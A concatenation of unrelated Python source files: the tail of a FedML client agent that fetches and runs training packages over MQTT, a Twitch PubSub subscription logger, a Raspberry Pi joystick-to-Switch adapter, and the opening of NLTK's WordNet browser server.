urllib.request.urlretrieve(package_url, local_package_file)
unzip_package_path = FedMLClientRunner.get_package_unzip_dir()
try:
shutil.rmtree(FedMLClientRunner.get_package_run_dir(package_name), ignore_errors=True)
except Exception as e:
pass
self.unzip_file(local_package_file, unzip_package_path)
unzip_package_path = FedMLClientRunner.get_package_run_dir(package_name)
return unzip_package_path
def update_local_fedml_config(self, run_id, run_config):
packages_config = run_config["packages_config"]
# Copy config file from the client
unzip_package_path = self.retrieve_and_unzip_package(packages_config["linuxClient"],
packages_config["linuxClientUrl"])
fedml_local_config_file = os.path.join(unzip_package_path, "conf", "fedml.yaml")
# Load the above config to memory
config_from_container = load_yaml_config(fedml_local_config_file)
container_entry_file_config = config_from_container["entry_config"]
container_dynamic_args_config = config_from_container["dynamic_args"]
entry_file = container_entry_file_config["entry_file"]
conf_file = container_entry_file_config["conf_file"]
full_conf_path = os.path.join(unzip_package_path, "fedml", "config", os.path.basename(conf_file))
# Dynamically build constrain variable with realtime parameters from server
self.build_dynamic_constrain_variables(run_id, run_config)
# Update entry arguments value with constrain variable values with realtime parameters from server
# currently we support the following constrain variables:
# ${FEDSYS_RUN_ID}: a run id represented one entire Federated Learning flow
# ${FEDSYS_PRIVATE_LOCAL_DATA}: private local data path in the Federated Learning client
# ${FEDSYS_CLIENT_ID_LIST}: client list in one entire Federated Learning flow
# ${FEDSYS_SYNTHETIC_DATA_URL}: synthetic data url from server,
# if this value is not null, the client will download data from this URL to use it as
# federated training data set
# ${FEDSYS_IS_USING_LOCAL_DATA}: whether use private local data as federated training data set
container_dynamic_args_config["data_cache_dir"] = "${FEDSYS.PRIVATE_LOCAL_DATA}"
for constrain_variable_key, constrain_variable_value in self.FEDML_DYNAMIC_CONSTRAIN_VARIABLES.items():
for argument_key, argument_value in container_dynamic_args_config.items():
if argument_value is not None and str(argument_value).find(constrain_variable_key) == 0:
replaced_argument_value = str(argument_value).replace(constrain_variable_key,
str(constrain_variable_value))
container_dynamic_args_config[argument_key] = replaced_argument_value
# Merge all container new config sections as new config dictionary
package_conf_object = dict()
package_conf_object["entry_config"] = container_entry_file_config
package_conf_object["dynamic_args"] = container_dynamic_args_config
package_conf_object["dynamic_args"]["config_version"] = self.args.config_version
container_dynamic_args_config["mqtt_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"mqtt_config_path"]))
container_dynamic_args_config["s3_config_path"] = os.path.join(unzip_package_path,
"fedml", "config",
os.path.basename(container_dynamic_args_config[
"s3_config_path"]))
log_file_dir = FedMLClientRunner.get_log_file_dir()
try:
os.makedirs(log_file_dir)
except Exception as e:
pass
package_conf_object["dynamic_args"]["log_file_dir"] = log_file_dir
# Save new config dictionary to local file
fedml_updated_config_file = os.path.join(unzip_package_path, "conf", "fedml.yaml")
FedMLClientRunner.generate_yaml_doc(package_conf_object, fedml_updated_config_file)
# Build dynamic arguments and set arguments to fedml config object
self.build_dynamic_args(run_config, package_conf_object, unzip_package_path)
return unzip_package_path, package_conf_object
def build_dynamic_args(self, run_config, package_conf_object, base_dir):
fedml_conf_file = package_conf_object["entry_config"]["conf_file"]
fedml_conf_path = os.path.join(base_dir, "fedml", "config", os.path.basename(fedml_conf_file))
fedml_conf_object = load_yaml_config(fedml_conf_path)
# Replace local fedml config objects with parameters from MLOps web
parameters_object = run_config.get("parameters", None)
if parameters_object is not None:
fedml_conf_object = parameters_object
package_dynamic_args = package_conf_object["dynamic_args"]
fedml_conf_object["comm_args"]["mqtt_config_path"] = package_dynamic_args["mqtt_config_path"]
fedml_conf_object["comm_args"]["s3_config_path"] = package_dynamic_args["s3_config_path"]
fedml_conf_object["common_args"]["using_mlops"] = True
fedml_conf_object["train_args"]["run_id"] = package_dynamic_args["run_id"]
fedml_conf_object["train_args"]["client_id_list"] = package_dynamic_args["client_id_list"]
fedml_conf_object["train_args"]["client_num_in_total"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["train_args"]["client_num_per_round"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["device_args"]["worker_num"] = int(package_dynamic_args["client_num_in_total"])
fedml_conf_object["data_args"]["data_cache_dir"] = package_dynamic_args["data_cache_dir"]
fedml_conf_object["tracking_args"]["log_file_dir"] = package_dynamic_args["log_file_dir"]
fedml_conf_object["tracking_args"]["log_server_url"] = package_dynamic_args["log_server_url"]
if hasattr(self.args, "local_server") and self.args.local_server is not None:
fedml_conf_object["comm_args"]["local_server"] = self.args.local_server
bootstrap_script_file = fedml_conf_object["environment_args"]["bootstrap"]
bootstrap_script_path = os.path.join(base_dir, "fedml", "config", os.path.basename(bootstrap_script_file))
try:
os.makedirs(package_dynamic_args["data_cache_dir"])
except Exception as e:
pass
fedml_conf_object["dynamic_args"] = package_dynamic_args
FedMLClientRunner.generate_yaml_doc(fedml_conf_object, fedml_conf_path)
try:
bootstrap_stat = os.stat(bootstrap_script_path)
os.chmod(bootstrap_script_path, bootstrap_stat.st_mode | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)
os.system(bootstrap_script_path)
except Exception as e:
click.echo("Exception when executing bootstrap.sh: {}", traceback.format_exc())
def build_image_unique_id(self, run_id, run_config):
config_name = str(run_config.get("configName", "run_" + str(run_id)))
config_creater = str(run_config.get("userId", "user_" + str(run_id)))
image_unique_id = re.sub('[^a-zA-Z0-9_-]', '', str(config_name + "_" + config_creater))
image_unique_id = image_unique_id.lower()
return image_unique_id
def run(self):
run_id = self.request_json["runId"]
run_config = self.request_json["run_config"]
data_config = run_config["data_config"]
packages_config = run_config["packages_config"]
self.setup_client_mqtt_mgr()
# get training params
private_local_data_dir = data_config.get("privateLocalData", "")
is_using_local_data = 0
# if private_local_data_dir is not None and len(str(private_local_data_dir).strip(' ')) > 0:
# is_using_local_data = 1
# start a run according to the hyper-parameters
# fedml_local_data_dir = self.cur_dir + "/fedml_data/run_" + str(run_id) + "_edge_" + str(edge_id)
fedml_local_data_dir = os.path.join(self.cur_dir, "fedml_data")
fedml_local_config_dir = os.path.join(self.cur_dir, "fedml_config")
if is_using_local_data:
fedml_local_data_dir = private_local_data_dir
self.fedml_data_dir = self.fedml_data_local_package_dir
# update local config with real time parameters from server and dynamically replace variables value
unzip_package_path, fedml_config_object = self.update_local_fedml_config(run_id, run_config)
entry_file_config = fedml_config_object["entry_config"]
dynamic_args_config = fedml_config_object["dynamic_args"]
entry_file = os.path.basename(entry_file_config["entry_file"])
conf_file = entry_file_config["conf_file"]
FedMLClientRunner.cleanup_learning_process()
os.chdir(os.path.join(unzip_package_path, "fedml"))
python_program = 'python'
python_version_str = os.popen("python --version").read()
if python_version_str.find("Python 3.") == -1:
python_version_str = os.popen("python3 --version").read()
if python_version_str.find("Python 3.") != -1:
python_program = 'python3'
process = subprocess.Popen([python_program, entry_file,
'--cf', conf_file, '--rank', str(dynamic_args_config["rank"])])
FedMLClientRunner.save_learning_process(process.pid)
def reset_devices_status(self, edge_id):
self.mlops_metrics.broadcast_client_training_status(edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED)
def stop_run(self):
self.setup_client_mqtt_mgr()
self.reset_devices_status(self.edge_id)
try:
FedMLClientRunner.cleanup_learning_process()
except Exception as e:
pass
click.echo("Stop run successfully.")
def setup_client_mqtt_mgr(self):
if self.client_mqtt_mgr is None:
self.client_mqtt_mgr = MqttManager(
self.agent_config["mqtt_config"]["BROKER_HOST"],
self.agent_config["mqtt_config"]["BROKER_PORT"],
self.agent_config["mqtt_config"]["MQTT_USER"],
self.agent_config["mqtt_config"]["MQTT_PWD"],
self.agent_config["mqtt_config"]["MQTT_KEEPALIVE"],
"ClientAgent_Comm_Client" + str(uuid.uuid4()),
)
time.sleep(3)
if self.mlops_metrics is None:
self.mlops_metrics = MLOpsMetrics()
self.mlops_metrics.set_messenger(self.client_mqtt_mgr)
@staticmethod
def exit_process(process):
if process is None:
return
try:
process.terminate()
process.join()
process = None
except Exception as e:
pass
def callback_start_train(self, topic, payload):
# get training params
request_json = json.loads(payload)
run_id = request_json["runId"]
# Terminate previous process about starting or stopping run command
FedMLClientRunner.exit_process(self.process)
FedMLClientRunner.cleanup_run_process()
FedMLClientRunner.save_runner_infos(self.args.device_id + "." + self.args.os_name, self.edge_id, run_id=run_id)
# Start cross-silo server with multi processing mode
self.request_json = request_json
client_runner = FedMLClientRunner(self.args, edge_id=self.edge_id,
request_json=request_json,
agent_config=self.agent_config)
self.process = multiprocessing.Process(target=client_runner.run)
self.process.start()
FedMLClientRunner.save_run_process(self.process.pid)
# self.run()
def callback_stop_train(self, topic, payload):
click.echo("callback_stop_train: topic = %s, payload = %s" % (topic, payload))
# Notify MLOps with the stopping message
self.mlops_metrics.report_client_training_status(self.edge_id,
MqttManager.MSG_MLOPS_CLIENT_STATUS_STOPPING)
request_json = json.loads(payload)
run_id = request_json["runId"]
click.echo("Stopping run...")
click.echo("Stop run with multiprocessing.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
client_runner = FedMLClientRunner(self.args, edge_id=self.edge_id,
request_json=request_json,
agent_config=self.agent_config)
try:
multiprocessing.Process(target=client_runner.stop_run).start()
except Exception as e:
pass
def cleanup_client_with_finished_status(self):
self.setup_client_mqtt_mgr()
self.stop_run()
@staticmethod
def get_fedml_home_dir():
home_dir = expanduser("~")
fedml_home_dir = os.path.join(home_dir, LOCAL_HOME_RUNNER_DIR_NAME)
return fedml_home_dir
@staticmethod
def get_log_file_dir():
log_file_dir = os.path.join(FedMLClientRunner.get_fedml_home_dir(), "fedml", "logs")
return log_file_dir
@staticmethod
def get_data_dir():
data_dir = os.path.join(FedMLClientRunner.get_fedml_home_dir(), "fedml", "data")
return data_dir
@staticmethod
def get_package_download_dir():
package_download_dir = os.path.join(FedMLClientRunner.get_fedml_home_dir(),
LOCAL_PACKAGE_HOME_DIR_NAME)
return package_download_dir
@staticmethod
def get_package_unzip_dir():
package_unzip_dir = FedMLClientRunner.get_package_download_dir()
return package_unzip_dir
@staticmethod
def get_package_run_dir(package_name):
package_file_no_extension = str(package_name).split('.')[0]
package_run_dir = os.path.join(FedMLClientRunner.get_package_unzip_dir(),
package_file_no_extension)
return package_run_dir
@staticmethod
def cleanup_run_process():
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-sub-process.id")
process_info = load_yaml_config(process_id_file)
process_id = process_info.get('process_id', None)
if process_id is not None:
try:
process = psutil.Process(process_id)
for sub_process in process.children():
os.kill(sub_process.pid, signal.SIGTERM)
if process is not None:
os.kill(process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def save_run_process(process_id):
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-sub-process.id")
yaml_object = {}
yaml_object['process_id'] = process_id
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def cleanup_learning_process():
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-learning-process.id")
process_info = load_yaml_config(process_id_file)
process_id = process_info.get('process_id', None)
if process_id is not None:
try:
process = psutil.Process(process_id)
for sub_process in process.children():
os.kill(sub_process.pid, signal.SIGTERM)
if process is not None:
os.kill(process.pid, signal.SIGTERM)
except Exception as e:
pass
yaml_object = {}
yaml_object['process_id'] = -1
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def save_learning_process(learning_id):
try:
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
process_id_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner-learning-process.id")
yaml_object = {}
yaml_object['process_id'] = learning_id
FedMLClientRunner.generate_yaml_doc(yaml_object, process_id_file)
except Exception as e:
pass
@staticmethod
def save_runner_infos(unique_device_id, edge_id, run_id=None):
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
try:
os.makedirs(local_pkg_data_dir)
except Exception as e:
pass
try:
os.makedirs(os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME))
except Exception as e:
pass
runner_info_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "runner_infos.yaml")
running_info = dict()
running_info["unique_device_id"] = str(unique_device_id)
running_info["edge_id"] = str(edge_id)
running_info["run_id"] = run_id
FedMLClientRunner.generate_yaml_doc(running_info, runner_info_file)
@staticmethod
def save_training_infos(edge_id, training_status):
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
try:
os.makedirs(local_pkg_data_dir)
except Exception as e:
pass
try:
os.makedirs(os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME))
except Exception as e:
pass
training_info_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "training_infos.yaml")
training_info = dict()
training_info["edge_id"] = edge_id
training_info["training_status"] = str(training_status)
FedMLClientRunner.generate_yaml_doc(training_info, training_info_file)
@staticmethod
def get_training_infos():
local_pkg_data_dir = FedMLClientRunner.get_data_dir()
training_info_file = os.path.join(local_pkg_data_dir, LOCAL_RUNNER_INFO_DIR_NAME, "training_infos.yaml")
training_info = dict()
training_info["edge_id"] = 0
training_info["training_status"] = "INITIALIZING"
try:
training_info = load_yaml_config(training_info_file)
except Exception as e:
pass
return training_info
def callback_runner_id_status(self, topic, payload):
click.echo("callback_runner_id_status: topic = %s, payload = %s" % (topic, payload))
request_json = json.loads(payload)
run_id = request_json["run_id"]
edge_id = request_json["edge_id"]
status = request_json["status"]
self.save_training_status(edge_id, status)
if status == MqttManager.MSG_MLOPS_CLIENT_STATUS_FINISHED:
click.echo("Received training finished message.")
click.echo("Stopping training client.")
# Stop cross-silo server with multi processing mode
self.request_json = request_json
client_runner = FedMLClientRunner(self.args, edge_id=self.edge_id,
request_json=request_json,
agent_config=self.agent_config)
multiprocessing.Process(target=client_runner.cleanup_client_with_finished_status).start()
def save_training_status(self, edge_id, training_status):
self.current_training_status = training_status
FedMLClientRunner.save_training_infos(edge_id, training_status)
@staticmethod
def get_device_id():
if "nt" in os.name:
def GetUUID():
cmd = 'wmic csproduct get uuid'
uuid = str(subprocess.check_output(cmd))
pos1 = uuid.find("\\n") + 2
uuid = uuid[pos1:-15]
return str(uuid)
device_id = str(GetUUID())
click.echo(device_id)
elif "posix" in os.name:
device_id = hex(uuid.getnode())
else:
device_id = subprocess.Popen(
"hal-get-property --udi /org/freedesktop/Hal/devices/computer --key system.hardware.uuid".split()
)
device_id = hex(device_id)
return device_id
def bind_account_and_device_id(self, url, account_id, device_id, os_name):
json_params = {"accountid": account_id, "deviceid": device_id, "type": os_name,
"gpu": "None", "processor": "", "network": ""}
_, cert_path = MLOpsConfigs.get_instance(self.args).get_request_params()
if cert_path is not None:
requests.session().verify = cert_path
response = requests.post(url, json=json_params, verify=True, headers={'Connection': 'close'})
else:
response = requests.post(url, json=json_params, headers={'Connection': 'close'})
status_code = response.json().get("code")
if status_code == "SUCCESS":
edge_id = response.json().get("data").get("id")
else:
return 0
return edge_id
def fetch_configs(self):
return MLOpsConfigs.get_instance(self.args).fetch_all_configs()
def setup_mqtt_connection(self, service_config):
# Setup MQTT connection
self.mqtt_mgr = MqttManager(
service_config["mqtt_config"]["BROKER_HOST"],
service_config["mqtt_config"]["BROKER_PORT"],
service_config["mqtt_config"]["MQTT_USER"],
service_config["mqtt_config"]["MQTT_PWD"],
service_config["mqtt_config"]["MQTT_KEEPALIVE"],
self.edge_id,
)
self.agent_config = service_config
self.mlops_metrics = MLOpsMetrics()
self.mlops_metrics.set_messenger(self.mqtt_mgr)
self.mlops_metrics.report_client_training_status(self.edge_id, MqttManager.MSG_MLOPS_CLIENT_STATUS_IDLE)
# Setup MQTT message listener for starting training
topic_start_train = "flserver_agent/" + str(self.edge_id) + "/start_train"
self.mqtt_mgr.add_message_listener(topic_start_train, self.callback_start_train)
# Setup MQTT message listener for stopping training
topic_stop_train = "flserver_agent/" + str(self.edge_id) + "/stop_train"
self.mqtt_mgr.add_message_listener(topic_stop_train, self.callback_stop_train)
# Setup MQTT message listener for client status switching
topic_client_status = "fl_client/mlops/" + str(self.edge_id) + "/status"
self.mqtt_mgr.add_message_listener(topic_client_status, self.callback_runner_id_status)
def mqtt_loop(self):
# Start MQTT message loop
self.mqtt_mgr.loop_forever()
|
pubSubListener.py
|
import json
import random
import re
import threading
import time
from datetime import datetime
import websocket
from bts import codes # py file containing secret keys and ID info
from bts import settings
from bts.dataBaseClass import Sub
from bts.frontPanel import LED_Blue
#to get user id: https://api.twitch.tv/kraken/users/<name>?client_id=apitoken
#to get channel id: https://api.twitch.tv/kraken/channels/<name>?client_id=apitoken
#user name vs display name:
#need to check if display name has non ^[a-zA-Z0-9_]{4,25}$ chars use username instead
pingstarttime = 0
pingTwitch = 0
SUBdidWork = 0
twitchOAuthToken = codes.twitchOAuth # this is generated at https://twitchapps.com/tokengen/ with scope "channel_subscriptions" and the api token from the dev dasboard
channelID = codes.channelID #oh_bother number code
userID = settings.pubSubUserId #lebtvlive
#e4t5v345nz3sm is just a unique code we set to check for in the return from twitch
#listenrequest = {"type": "LISTEN", "nonce": "e4t5v345nz3sm", "data": { "topics": ["whispers." + userID], "auth_token": twitchOAuthToken}} #this is what i tested it with for whisper messages
listenrequest = {"type": "LISTEN", "nonce": "e4t5v345nz3sm", "data": { "topics": ["channel-subscribe-events-v1." + channelID], "auth_token": twitchOAuthToken}} #this is for sub events
ws1 = ""
#log file
loggies = settings.wsLogFile
def ws1_on_message(ws, message):
jsonReturn = json.loads(message)
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" raw message: ")
logOutput.write(message)
logOutput.write("\n")
logOutput.close()
if "type" in jsonReturn:
if jsonReturn["type"] == "PONG": #Take care of pong responses
pingstarttime = 0
print("PONG received")
LED_Blue.on()
elif jsonReturn["type"] == "RECONNECT": #Close if twitch tells us so and reconnect
print(jsonReturn)
try:
ws.close()
except:
pass
elif jsonReturn["type"] == "RESPONSE": #We get this as a response to our subToTopic request
if jsonReturn["nonce"] == "e4t5v345nz3sm" and jsonReturn["error"] == "": #validate this is the right response and there was no error
print("socket sub successful")
SUBdidWork = 1
else: #If there was something wrong
print(jsonReturn)
elif jsonReturn["type"] == "MESSAGE": #This is the message you get when an event itself happens
#print(jsonReturn["data"]["message"])
makeEntry(json.loads(jsonReturn["data"]["message"]))
else:
print(jsonReturn) #if there is anything else, just print it(shouldn't be the case)
def makeEntry(message):
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ")
logOutput.write(json.dumps(message))
logOutput.write('\n')
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
if 'recipient_user_name' in message.keys():
repName = message['recipient_display_name']
repUser = message['recipient_user_name']
if checkName(repName):
enterDb(repName)
logOutput.write("using repName: " + repName)
#print(repName)
else:
enterDb(repUser)
logOutput.write("using repUser: " + repUser)
#print(repUser)
else:
dispName = message['display_name']
usrName = message['user_name']
if checkName(dispName):
enterDb(dispName)
logOutput.write("using dispName: " + dispName)
#print(dispName)
else:
enterDb(usrName)
logOutput.write("using usrName: " + usrName)
#print("fuck you buddy")
logOutput.write("\n")
logOutput.close()
def checkName(name):
if re.search(r'[^a-zA-Z0-9_]', name):
return False
else:
return True
def enterDb(entry):
print("pubSub: entering " + entry)
dateInfo = datetime.utcnow()
dbEntry = Sub.create(
userName = entry,
entryTime = dateInfo
)
dbEntry.save()
def ws1_on_error(ws, error): #get's called when there was a websocket connection error
global pingTwitch, SUBdidWork
print (error)
pingTwitch = 0
SUBdidWork = 0
LED_Blue.blink()
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 error: ")
logOutput.write(error)
logOutput.write("\n")
logOutput.close()
def ws1_on_close(ws): #get's called when the websocket connection was closed
global pingTwitch, SUBdidWork
print("### ws1 closed ###")
pingTwitch = 0
SUBdidWork = 0
LED_Blue.off()
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 closed\n")
logOutput.close()
def ws1_on_open(ws): #get's called when the websocket connection was opened (connected to the server and handshake successfull)
global pingTwitch
print("### ws1 opened ###")
pingTwitch = 1
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 opened\n")
logOutput.close()
subToTopics()
def ws1_start(): #this is the main server loop
while True:
print("### ws1 restart ###")
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" ws1 restart\n")
logOutput.close()
ws1.run_forever()
def subToTopics(): #send our listen request
ws1.send(json.dumps(listenrequest))
def pingTwitchServersToKeepTheConnectionAliveTask(): #This PINGs the server every 4 minutes as per twitch api docs
while True:
if pingTwitch:
print("Pinging Twitch")
ws1.send(json.dumps({"type": "PING"}))
LED_Blue.off()
pingstarttime = time.time() #we could later do something with this time but we don't have to
time.sleep(10) #wait 10 sec for ping response
if not pingstarttime: #is pingstarttime was not reset, close the connection
ws.close()
time.sleep(240 + random.randrange(-10, 10)) #Sleep 4 min +/- 10sec (random is required by twitch api)
def webSocketInit():
global ws1
print("pubSub started, opening socket")
#log file
logOutput = open(loggies, "a")
logOutput.write(datetime.utcnow().strftime('%Y,%m,%d,%H:%M:%S:%f'))
logOutput.write(" pubSub Started\n")
logOutput.close()
ws1 = websocket.WebSocketApp("wss://pubsub-edge.twitch.tv", on_message = ws1_on_message, on_error = ws1_on_error, on_close = ws1_on_close) #Create Websocket Client Object
ws1.on_open = ws1_on_open
threading.Thread(target=ws1_start).start() #Start Websocket Thread
threading.Thread(target=pingTwitchServersToKeepTheConnectionAliveTask).start() # Start PING Thread
if __name__ == "__main__":
webSocketInit()
threading.Thread(target=ws1_start).start() #Start Websocket Thread
threading.Thread(target=pingTwitchServersToKeepTheConnectionAliveTask).start() # Start PING Thread
|
nsgamepad_dragonrise.py
|
#!/usr/bin/python3
"""
Read from Dragon Rise Arcade Joystick and write to NSGadget.
DRAJ -> Raspberry Pi -> NSGadget -> Nintendo Switch
"""
import os
import time
from sys import exit
from struct import unpack
import threading
import array
from fcntl import ioctl
import serial
from nsgpadserial import NSGamepadSerial, NSButton, NSDPad
Nsg = NSGamepadSerial()
Nsg.begin(serial.Serial('/dev/ttyUSB0', 8*115200, timeout=0))
# Open the DRAJ
# joystick code based on https://gist.github.com/rdb/8864666
js_num = 0;
for fn in os.listdir('/dev/input'):
if fn.startswith('js'):
print('/dev/input/%s' % (fn))
jsdev = open('/dev/input/' + fn, 'rb')
buf = array.array('B', [0] * 64)
ioctl(jsdev, 0x80006a13 + (0x10000 * len(buf)), buf) # JSIOCGNAME(len)
js_name = buf.tobytes().rstrip(b'\x00').decode('utf-8').upper()
print('Device name: %s' % js_name)
if 'DRAGONRISE INC. GENERIC USB JOYSTICK' in js_name:
js_num += 1
if js_num == 1:
js_left = jsdev
elif js_num == 2:
js_right = jsdev
else:
jsdev.close()
if js_num < 2:
print('DRAGONRISE joysticks not found')
exit(1)
print('DRAGONRISE joysticks found')
# Get number of axes and buttons
buf = array.array('B', [0])
ioctl(js_left, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(js_left, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
print('left num_axes = %s num_buttons = %s' % (num_axes, num_buttons))
# Get number of axes and buttons
buf = array.array('B', [0])
ioctl(js_right, 0x80016a11, buf) # JSIOCGAXES
num_axes = buf[0]
buf = array.array('B', [0])
ioctl(js_right, 0x80016a12, buf) # JSIOCGBUTTONS
num_buttons = buf[0]
print('right num_axes = %s num_buttons = %s' % (num_axes, num_buttons))
# Map DRAJ button numbers to NS gamepad buttons
# DRAJ buttons
# 0 = front trigger
# 1 = side thumb rest button
# 2 = top large left
# 3 = top large right
# 4 = top small left
# 5 = top small right
#
# Button array (2 rows, 3 columns) on base
#
# 7 9 11
# 6 8 10
#
BUTTON_MAP_LEFT = array.array('B', [
NSButton.LEFT_THROTTLE,
NSButton.LEFT_TRIGGER,
NSButton.MINUS,
255, # Up
255, # Right
255, # Down
255, # Left
NSButton.LEFT_STICK,
NSButton.CAPTURE,
NSButton.CAPTURE,
NSButton.CAPTURE,
NSButton.CAPTURE])
BUTTON_MAP_RIGHT = array.array('B', [
NSButton.RIGHT_THROTTLE,
NSButton.RIGHT_TRIGGER,
NSButton.PLUS,
NSButton.A,
NSButton.B,
NSButton.X,
NSButton.Y,
NSButton.RIGHT_STICK,
NSButton.HOME,
NSButton.HOME,
NSButton.HOME,
NSButton.HOME])
BUTTONS_MAP_DPAD = array.array('B', [
# LDRU
NSDPad.CENTERED, # 0000
NSDPad.UP, # 0001
NSDPad.RIGHT, # 0010
NSDPad.UP_RIGHT, # 0011
NSDPad.DOWN, # 0100
NSDPad.CENTERED, # 0101
NSDPad.DOWN_RIGHT, # 0110
NSDPad.CENTERED, # 0111
NSDPad.LEFT, # 1000
NSDPad.UP_LEFT, # 1001
NSDPad.CENTERED, # 1010
NSDPad.CENTERED, # 1011
NSDPad.DOWN_LEFT, # 1100
NSDPad.CENTERED, # 1101
NSDPad.CENTERED, # 1110
NSDPad.CENTERED # 1111
])
def read_js_left():
dpad_bits = 0
while True:
evbuf_left = js_left.read(8)
if evbuf_left:
time, value, type, number = unpack('IhBB', evbuf_left)
if type & 0x01: # button event
button_out = BUTTON_MAP_LEFT[number]
if button_out == 255:
if value:
dpad_bits |= (1 << (number - 3))
else:
dpad_bits &= ~(1 << (number - 3))
Nsg.dPad(BUTTONS_MAP_DPAD[dpad_bits])
else:
if value:
Nsg.press(button_out)
else:
Nsg.release(button_out)
if type & 0x02: # axis event
# NS wants values 0..128..255 where 128 is center position
axis = ((value + 32767) >> 8)
if axis == 127:
axis = 128
# Axes 0,1 left stick X,Y
if number == 0:
Nsg.leftXAxis(axis)
elif number == 1:
Nsg.leftYAxis(axis)
def read_js_right():
while True:
evbuf_right = js_right.read(8)
if evbuf_right:
time, value, type, number = unpack('IhBB', evbuf_right)
if type & 0x01: # button event
button_out = BUTTON_MAP_RIGHT[number]
if value:
Nsg.press(button_out)
else:
Nsg.release(button_out)
if type & 0x02: # axis event
# NS wants values 0..128..255 where 128 is center position
axis = ((value + 32767) >> 8)
if axis == 127:
axis = 128
# Axes 0,1 left stick X,Y
if number == 0:
Nsg.rightXAxis(axis)
elif number == 1:
Nsg.rightYAxis(axis)
while True:
task_left = threading.Thread(target=read_js_left)
task_right = threading.Thread(target=read_js_right)
task_left.start()
task_right.start()
while True:
time.sleep(60)
|
wordnet_app.py
|
# Natural Language Toolkit: WordNet Browser Application
#
# Copyright (C) 2001-2019 NLTK Project
# Author: Jussi Salmela <jtsalmela@users.sourceforge.net>
# Paul Bone <pbone@students.csse.unimelb.edu.au>
# URL: <http://nltk.org/>
# For license information, see LICENSE.TXT
"""
A WordNet Browser application which launches the default browser
(if it is not already running) and opens a new tab with a connection
to http://localhost:port/ . It also starts an HTTP server on the
specified port and begins serving browser requests. The default
port is 8000. (For command-line help, run "python wordnet -h")
This application requires that the user's web browser supports
Javascript.
BrowServer is a server for browsing the NLTK Wordnet database It first
launches a browser client to be used for browsing and then starts
serving the requests of that and maybe other clients
Usage::
browserver.py -h
browserver.py [-s] [-p <port>]
Options::
-h or --help
Display this help message.
-l <file> or --log-file <file>
Logs messages to the given file, If this option is not specified
messages are silently dropped.
-p <port> or --port <port>
Run the web server on this TCP port, defaults to 8000.
-s or --server-mode
Do not start a web browser, and do not allow a user to
shotdown the server through the web interface.
"""
# TODO: throughout this package variable names and docstrings need
# modifying to be compliant with NLTK's coding standards. Tests also
# need to be develop to ensure this continues to work in the face of
# changes to other NLTK packages.
from __future__ import print_function
# Allow this program to run inside the NLTK source tree.
from sys import path
import os
import sys
from sys import argv
from collections import defaultdict
import webbrowser
import datetime
import re
import threading
import time
import getopt
import base64
import pickle
import copy
from six.moves.urllib.parse import unquote_plus
from nltk import compat
from nltk.corpus import wordnet as wn
from nltk.corpus.reader.wordnet import Synset, Lemma
if compat.PY3:
from http.server import HTTPServer, BaseHTTPRequestHandler
else:
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
# now included in local file
# from util import html_header, html_trailer, \
# get_static_index_page, get_static_page_by_path, \
# page_from_word, page_from_href
firstClient = True
# True if we're not also running a web browser. The value f server_mode
# gets set by demo().
server_mode = None
# If set this is a file object for writting log messages.
logfile = None
class MyServerHandler(BaseHTTPRequestHandler):
def do_HEAD(self):
self.send_head()
def do_GET(self):
global firstClient
sp = self.path[1:]
if unquote_plus(sp) == 'SHUTDOWN THE SERVER':
if server_mode:
page = "Server must be killed with SIGTERM."
type = "text/plain"
else:
print('Server shutting down!')
os._exit(0)
elif sp == '': # First request.
type = 'text/html'
if not server_mode and firstClient:
firstClient = False
page = get_static_index_page(True)
else:
page = get_static_index_page(False)
word = 'green'
elif sp.endswith('.html'): # Trying to fetch a HTML file TODO:
type = 'text/html'
usp = unquote_plus(sp)
